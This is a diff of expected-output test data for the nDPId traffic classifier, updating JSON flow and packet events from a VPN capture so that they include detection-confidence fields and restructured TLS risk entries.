{"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}}
-01318{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687267035,"flow_last_seen":1569687267203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5944,"flow_avg_l4_payload_len":495,"midstream":0,"ts_msec":1569687267203,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687267035,"flow_last_seen":1569687267079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1569687267079,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01198{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":303,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267035,"flow_last_seen":1569687267125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":266,"midstream":0,"ts_msec":1569687267125,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}}
+01585{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687267035,"flow_last_seen":1569687267203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5944,"flow_avg_l4_payload_len":495,"midstream":0,"ts_msec":1569687267203,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267453,"flow_last_seen":1569687267453,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569687267453,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1569687267453,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569687267453,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld4hH0glPK3eiXsRe4AREAA75QAAAQEIChwN0AsAIb2q"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267453,"flow_last_seen":1569687267453,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569687267453,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -185,16 +185,16 @@
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1569687267455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569687267455,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld4hH0glPK3fiXsRfIAQEAAaFwAAAQEIChwN0A0AId91"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267477,"flow_last_seen":1569687267477,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1569687267477,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1569687267477,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1569687267477,"pkt":"LH6BsEqhNDY7z3UoCABFAAA5Pw0AAP8R2y0KAADjS0tLS9+lADUAJfklv50BAAABAAAAAAAAB21vemlsbGEDb3JnAAABAAE="}
-00735{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267477,"flow_last_seen":1569687267477,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1569687267477,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mozilla.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267477,"flow_last_seen":1569687267477,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1569687267477,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mozilla.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267481,"flow_last_seen":1569687267481,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1569687267481,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1569687267481,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"ts_msec":1569687267481,"pkt":"LH6BsEqhNDY7z3UoCABFAABG89oAAP8RJlMKAADjS0tLS\/PbADUAMlit7RYBAAABAAAAAAAADGRldGVjdHBvcnRhbAdmaXJlZm94A2NvbQAAAQAB"}
-00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267481,"flow_last_seen":1569687267481,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1569687267481,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"detectportal.firefox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":61,"midstream":1,"ts_msec":1569687267482,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt?ipv4","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}}
-00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267483,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":60,"midstream":1,"ts_msec":1569687267483,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}}
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267481,"flow_last_seen":1569687267481,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1569687267481,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"detectportal.firefox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":61,"midstream":1,"ts_msec":1569687267482,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt?ipv4","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}}
+00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267483,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":60,"midstream":1,"ts_msec":1569687267483,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1569687267493,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"ts_msec":1569687267493,"pkt":"NDY7z3UoLH6BsEqhCABFAABJAABAADoRnytLS0tLCgAA4wA136UANZKzv52BgAABAAEAAAAAB21vemlsbGEDb3JnAAABAAHADAABAAEAAAAaAAQ\/9dDD"}
-00750{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267477,"flow_last_seen":1569687267493,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1569687267493,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mozilla.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"63.245.208.195"}}
+00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267477,"flow_last_seen":1569687267493,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1569687267493,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mozilla.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"63.245.208.195"}}
 00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1569687267500,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"ts_msec":1569687267500,"pkt":"NDY7z3UoLH6BsEqhCABFAADkAABAADoRnpBLS0tLCgAA4wA189sA0PLn7RaBgAABAAUAAAAADGRldGVjdHBvcnRhbAdmaXJlZm94A2NvbQAAAQABwAwABQABAAAAIwAeDGRldGVjdHBvcnRhbARwcm9kBm1vemF3cwNuZXQAwDYABQABAAAADgAoDGRldGVjdHBvcnRhbAdmaXJlZm94BmNvbS12MgllZGdlc3VpdGXAT8BgAAUAAQAAUnoAFAVhMTA4OQRkc2NkBmFrYW1hacBPwJQAAQABAAAACQAEuBk4UsCUAAEAAQAAAAkABLgZODM="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":354,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267481,"flow_last_seen":1569687267500,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":121,"midstream":0,"ts_msec":1569687267500,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"detectportal.firefox.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.56.82"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":354,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267481,"flow_last_seen":1569687267500,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":121,"midstream":0,"ts_msec":1569687267500,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"detectportal.firefox.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.56.82"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267677,"flow_last_seen":1569687267677,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1569687267677,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1569687267677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1569687267677,"pkt":"LH6BsEqhNDY7z3UoCABFAABb+tIAAEAGzQsKAADjNApz0t4vAbv\/h0Qcal\/PeIAYEACaRQAAAQEIChwN0OQwQN34FwMDACIAAAAAAAAAAwpFwR2TiNxP0z\/UzUIiCJ75mBQ8ToLTjZaT"}
 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1569687267713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"ts_msec":1569687267713,"pkt":"NDY7z3UoLH6BsEqhCABFAABXHWRAAOsGv300CnPSCgAA4wG73i9qX894\/4dEQ4AYAHaKdwAAAQEICjBBJbkcDdDkFwMDAB60PFmzucBfQdusHvXD0\/WWAM1faNPMBMLPArfIzdE="}
@@ -204,74 +204,74 @@
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1569687267797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569687267797,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0xfMAAEAGCEEKAADjETmQdN42FGcxHLjbZd23sYAREACqlQAAAQEIChwN0VbVpVJo"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1569687267799,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1569687267799,"pkt":"LH6BsEqhNDY7z3UoCABFAAA72BEAAP8RQicKAADjS0tLS+u1ADUAJxlWhe8BAAABAAAAAAAAA3d3dwVhcHBsZQNjb20AAAEAAQ=="}
-00733{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"www.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"www.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1569687267799,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"ts_msec":1569687267799,"pkt":"LH6BsEqhNDY7z3UoCABFAABGM9oAAP8R5lMKAADjS0tLS8d0ADUAMjjn9V4BAAABAAAAAAAACTEtY291cmllcgRwdXNoBWFwcGxlA2NvbQAAAQAB"}
